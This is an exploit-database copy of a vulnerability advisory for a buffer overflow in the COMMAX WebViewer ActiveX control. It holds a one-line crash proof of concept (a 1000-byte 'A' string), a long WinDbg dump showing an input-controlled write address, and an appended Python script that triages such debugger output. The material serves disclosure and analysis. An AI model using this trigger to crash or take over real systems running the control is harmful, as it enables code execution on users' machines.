COMMAX WebViewer ActiveX Control 2.1.4.5 – ‘Commax_WebViewer.ocx’ Buffer Overflow

  • Author: LiquidWorm
    Date: 2021-08-27
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50231/
  • # Exploit Title: COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow
    # Date: 02.08.2021
    # Exploit Author: LiquidWorm
    # Vendor Homepage: https://www.commax.com
    
    COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow
    
    
    Vendor: COMMAX Co., Ltd.
    Product web page: https://www.commax.com
    Affected version: 2.1.4.5
    
    Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.
    
    Desc: The vulnerability is caused by a boundary error in the
    processing of user input, which can be exploited to cause a buffer
    overflow when a user supplies an overly long string of bytes
    through several of the control's functions. Successful exploitation
    could allow execution of arbitrary code on the affected node.
    
    Tested on: Microsoft Windows 10 Home (64bit) EN
               Microsoft Internet Explorer 20H2
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2021-5663
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php
    
    
    02.08.2021
    
    --
    
    
    $ python
    >>> "A"*1000 [ToTheClipboard]
    >>> # Paste in ID or anywhere
    
    (5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
    wow64!Wow64pNotifyDebugger+0x19918:
    00007ff9`deb0b530 c644242001      mov     byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
    0:038> g
    (5220.5b30): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
    CNC_Ctrl!DllUnregisterServer+0xf5501:
    0b4d43bf f3aa            rep stos byte ptr es:[edi]
    0:038:x86> r
    eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
    eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
    CNC_Ctrl!DllUnregisterServer+0xf5501:
    0b4d43bf f3aa            rep stos byte ptr es:[edi]
    0:038:x86> !exchain
    0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
    0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
    CRT scope0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
    func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
    0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
    Invalid exception stack at ffffffff
    0:038:x86> kb
     # ChildEBP RetAddr  Args to Child
    WARNING: Stack unwind information not available. Following frames may be wrong.
    00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
    01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
    02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
    03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
    0:038:x86> d esp
    0d78f920  0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b  ...........vx.~.
    0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
    0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
    0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
    0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
    0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
    0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
    0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
    0:038:x86> d ebp
    0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
    0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
    0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%.@...x. ...
    0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
    0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
    0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
    0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
    0d78f9a0  8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00  ................
    0:038:x86> d esi
    41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    0:038:x86> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ie_to_edge_bho.dll - 
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Commax_WebViewer.OCX - 
    GetUrlPageData2 (WinHttp) failed: 12002.
    
    DUMP_CLASS: 2
    
    DUMP_QUALIFIER: 0
    
    FAULTING_IP: 
    CNC_Ctrl!DllUnregisterServer+f5501
    0b4d43bf f3aa            rep stos byte ptr es:[edi]
    
    EXCEPTION_RECORD:(.exr -1)
    ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
     ExceptionCode: c0000005 (Access violation)
    ExceptionFlags: 00000000
    NumberParameters: 2
     Parameter[0]: 00000001
     Parameter[1]: 41414141
    Attempt to write to address 41414141
    
    FAULTING_THREAD:00005b30
    
    DEFAULT_BUCKET_ID:INVALID_POINTER_WRITE
    
    PROCESS_NAME:IEXPLORE.EXE
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:c0000005
    
    EXCEPTION_PARAMETER1:00000001
    
    EXCEPTION_PARAMETER2:41414141
    
    FOLLOWUP_IP: 
    CNC_Ctrl!DllUnregisterServer+f5501
    0b4d43bf f3aa            rep stos byte ptr es:[edi]
    
    WRITE_ADDRESS:41414141 
    
    WATSON_BKT_PROCSTAMP:95286d96
    
    WATSON_BKT_PROCVER:11.0.19041.1
    
    PROCESS_VER_PRODUCT:Internet Explorer
    
    WATSON_BKT_MODULE:CNC_Ctrl.DLL
    
    WATSON_BKT_MODSTAMP:547ed821
    
    WATSON_BKT_MODOFFSET:1043bf
    
    WATSON_BKT_MODVER:1.7.0.2
    
    MODULE_VER_PRODUCT:CNC_Ctrl Module
    
    BUILD_VERSION_STRING:10.0.19041.1023 (WinBuild.160101.0800)
    
    MODLIST_WITH_TSCHKSUM_HASH:aadfa1c5bdd8f77b979f6a5b222994db450b715e
    
    MODLIST_SHA1_HASH:849cfdbdcb18d5749dc41f313fc544a643772db9
    
    NTGLOBALFLAG:0
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:0
    
    PRODUCT_TYPE:1
    
    SUITE_MASK:784
    
    DUMP_TYPE:fe
    
    ANALYSIS_SESSION_HOST:LAB17
    
    ANALYSIS_SESSION_TIME:08-12-2021 14:20:11.0116
    
    ANALYSIS_VERSION: 10.0.16299.91 amd64fre
    
    THREAD_ATTRIBUTES: 
    OS_LOCALE:ENU
    
    PROBLEM_CLASSES: 
    
    ID: [0n301]
    Type: [@ACCESS_VIOLATION]
    Class:Addendum
    Scope:BUCKET_ID
    Name: Omit
    Data: Omit
    PID:[Unspecified]
    TID:[0x5b30]
    Frame:[0] : CNC_Ctrl!DllUnregisterServer
    
    ID: [0n274]
    Type: [INVALID_POINTER_WRITE]
    Class:Primary
    Scope:DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
    BUCKET_ID
    Name: Add
    Data: Omit
    PID:[Unspecified]
    TID:[0x5b30]
    Frame:[0] : CNC_Ctrl!DllUnregisterServer
    
    ID: [0n152]
    Type: [ZEROED_STACK]
    Class:Addendum
    Scope:BUCKET_ID
    Name: Add
    Data: Omit
    PID:[0x5220]
    TID:[0x5b30]
    Frame:[0] : CNC_Ctrl!DllUnregisterServer
    
    BUGCHECK_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK
    
    PRIMARY_PROBLEM_CLASS:APPLICATION_FAULT
    
    LAST_CONTROL_TRANSFER:from 0b405dea to 0b4d43bf
    
    STACK_TEXT:
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
    0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
    0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
    0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
    
    
    THREAD_SHA1_HASH_MOD_FUNC:e84e62df4095d241971250198ae18de0797cfdc7
    
    THREAD_SHA1_HASH_MOD_FUNC_OFFSET:2033316a7c1a92aaeab1ce97e013350953fef546
    
    THREAD_SHA1_HASH_MOD:6d850af928076b326edbcafdf6dd4f771aafbab5
    
    FAULT_INSTR_CODE:458baaf3
    
    SYMBOL_STACK_INDEX:0
    
    SYMBOL_NAME:CNC_Ctrl!DllUnregisterServer+f5501
    
    FOLLOWUP_NAME:MachineOwner
    
    MODULE_NAME: CNC_Ctrl
    
    IMAGE_NAME:CNC_Ctrl.DLL
    
    DEBUG_FLR_IMAGE_TIMESTAMP:547ed821
    
    STACK_COMMAND:~38s ; .cxr ; kb
    
    FAILURE_BUCKET_ID:INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer
    
    BUCKET_ID:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501
    
    FAILURE_EXCEPTION_CODE:c0000005
    
    FAILURE_IMAGE_NAME:CNC_Ctrl.DLL
    
    BUCKET_ID_IMAGE_STR:CNC_Ctrl.DLL
    
    FAILURE_MODULE_NAME:CNC_Ctrl
    
    BUCKET_ID_MODULE_STR:CNC_Ctrl
    
    FAILURE_FUNCTION_NAME:DllUnregisterServer
    
    BUCKET_ID_FUNCTION_STR:DllUnregisterServer
    
    BUCKET_ID_OFFSET:f5501
    
    BUCKET_ID_MODTIMEDATESTAMP:547ed821
    
    BUCKET_ID_MODCHECKSUM:357a4b
    
    BUCKET_ID_MODVER_STR:1.7.0.2
    
    BUCKET_ID_PREFIX_STR:APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_
    
    FAILURE_PROBLEM_CLASS:APPLICATION_FAULT
    
    FAILURE_SYMBOL_NAME:CNC_Ctrl.DLL!DllUnregisterServer
    
    WATSON_STAGEONE_URL:http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1
    
    TARGET_TIME:2021-08-12T12:21:50.000Z
    
    OSBUILD:19042
    
    OSSERVICEPACK:1023
    
    SERVICEPACK_NUMBER: 0
    
    OS_REVISION: 0
    
    OSPLATFORM_TYPE:x64
    
    OSNAME:Windows 10
    
    OSEDITION:Windows 10 WinNt SingleUserTS Personal
    
    USER_LCID:0
    
    OSBUILD_TIMESTAMP:unknown_date
    
    BUILDDATESTAMP_STR:160101.0800
    
    BUILDLAB_STR:WinBuild
    
    BUILDOSVER_STR:10.0.19041.1023
    
    ANALYSIS_SESSION_ELAPSED_TIME:1d869
    
    ANALYSIS_SOURCE:UM
    
    FAILURE_ID_HASH_STRING:um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver
    
    FAILURE_ID_HASH:{5e1e375a-c411-e928-cd64-b7f6c07eea3b}
    
    Followup: MachineOwner
    ---------
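As an added triage example (not part of the advisory or of the vendor's code): a small Python parser that reads the `r` and `.exr -1` lines quoted above and reports whether the faulting access and any registers consist entirely of the 0x41 input bytes, which is what makes this write access violation a serious finding rather than a plain crash. The sample text is constructed from the session above; the classification labels are this example's own assumption, not a WinDbg feature.

```python
import re

# Constructed sample: the `r` and `.exr -1` output quoted in the advisory above.
WINDBG_SESSION = """\
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
   ExceptionCode: c0000005 (Access violation)
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 41414141
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bsi]p)=([0-9a-f]{8})\b")
PARAM_RE = re.compile(r"Parameter\[(\d)\]:\s*([0-9a-f]{8})")
CODE_RE = re.compile(r"ExceptionCode:\s*([0-9a-f]{8})")
ACCESS = {0: "read", 1: "write", 8: "execute"}  # meaning of Parameter[0] for STATUS_ACCESS_VIOLATION


def parse_session(text):
    """Pull the 32-bit registers, exception parameters and exception code out of raw WinDbg text."""
    regs = {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(text)}
    params = {int(m.group(1)): int(m.group(2), 16) for m in PARAM_RE.finditer(text)}
    code = CODE_RE.search(text)
    return regs, params, (int(code.group(1), 16) if code else None)


def looks_like_pattern(value, fill=0x41):
    """True when every byte of a 32-bit value is the fill byte, i.e. it came straight from the 'A' input."""
    return all(((value >> shift) & 0xFF) == fill for shift in (0, 8, 16, 24))


def triage(text):
    """Classify an access violation by whether the faulting address and registers are input-controlled."""
    regs, params, code = parse_session(text)
    if code != 0xC0000005:
        return {"verdict": "not-an-access-violation", "controlled": []}
    access = ACCESS.get(params.get(0), "unknown")
    fault_addr = params.get(1)
    controlled = sorted(r for r, v in regs.items() if looks_like_pattern(v))
    if fault_addr is not None and looks_like_pattern(fault_addr):
        # The faulting address is made of attacker bytes; a write there is the worst case.
        verdict = f"{access}-at-controlled-address"
    elif controlled:
        verdict = "controlled-registers-but-fault-elsewhere"
    else:
        verdict = "uncontrolled-crash"
    return {"verdict": verdict, "access": access, "fault_addr": fault_addr, "controlled": controlled}


if __name__ == "__main__":
    print(triage(WINDBG_SESSION))  # verdict: 'write-at-controlled-address', controlled: ['edi', 'esi']
```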